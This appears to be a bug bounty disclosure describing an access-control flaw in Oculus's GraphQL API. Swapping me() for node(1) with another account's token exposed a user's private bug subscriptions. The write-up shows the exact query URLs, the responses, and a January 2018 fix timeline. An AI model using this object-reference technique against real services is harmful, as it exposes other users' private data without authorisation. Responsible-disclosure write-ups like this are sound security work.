Within https://developer.oculus.com/bugs/, there is the ability to subscribe to Oculus bugs created by users. However it is possible to query the subscribed bugs for any user.
User: phwd
ID: 1
OC Access Token: TOKEN_ONE
Malicious User: phwdtest
ID: 2
OC Access Token: TOKEN_TWO
https://graph.oculus.com/graphql?q=me%28%29%7Bsubscribed_external_tasks%7Bnodes%7Bid%2Ctitle%7D%7D%7D&access_token=TOKEN_ONE
Bug subscriptions for phwd
{
"1": {
"subscribed_external_tasks": {
"nodes": [{
"id": "33",
"title": "HARDWARE ERROR"
}]
}
}
}
Check bug subscriptions for phwdtest
https://graph.oculus.com/graphql?q=me%28%29%7Bsubscribed_external_tasks%7Bnodes%7Bid%2Ctitle%7D%7D%7D&access_token=TOKEN_TWO
{
"2": {
"subscribed_external_tasks": {
"nodes": []
}
}
}
Check bug subscriptions for phwd as phwdtest
https://graph.oculus.com/graphql?q=node%281%29%7Bsubscribed_external_tasks%7Bnodes%7Bid%2Ctitle%7D%7D%7D&access_token=TOKEN_TWO
{
"1": {
"subscribed_external_tasks": {
"nodes": [{
"id": "33",
"title": "HARDWARE ERROR"
}]
}
}
}
Impact
This could have let an attacker view bugs which an Oculus user has subscribed to, which is intended not to be public.
Timeline
- Jan 15, 2018 – Report Sent
- Jan 16, 2018 - Further investigation by Facebook
- Jan 29, 2018 – Fixed by Facebook
- Jan 31, 2018 – Bounty Awarded by Facebook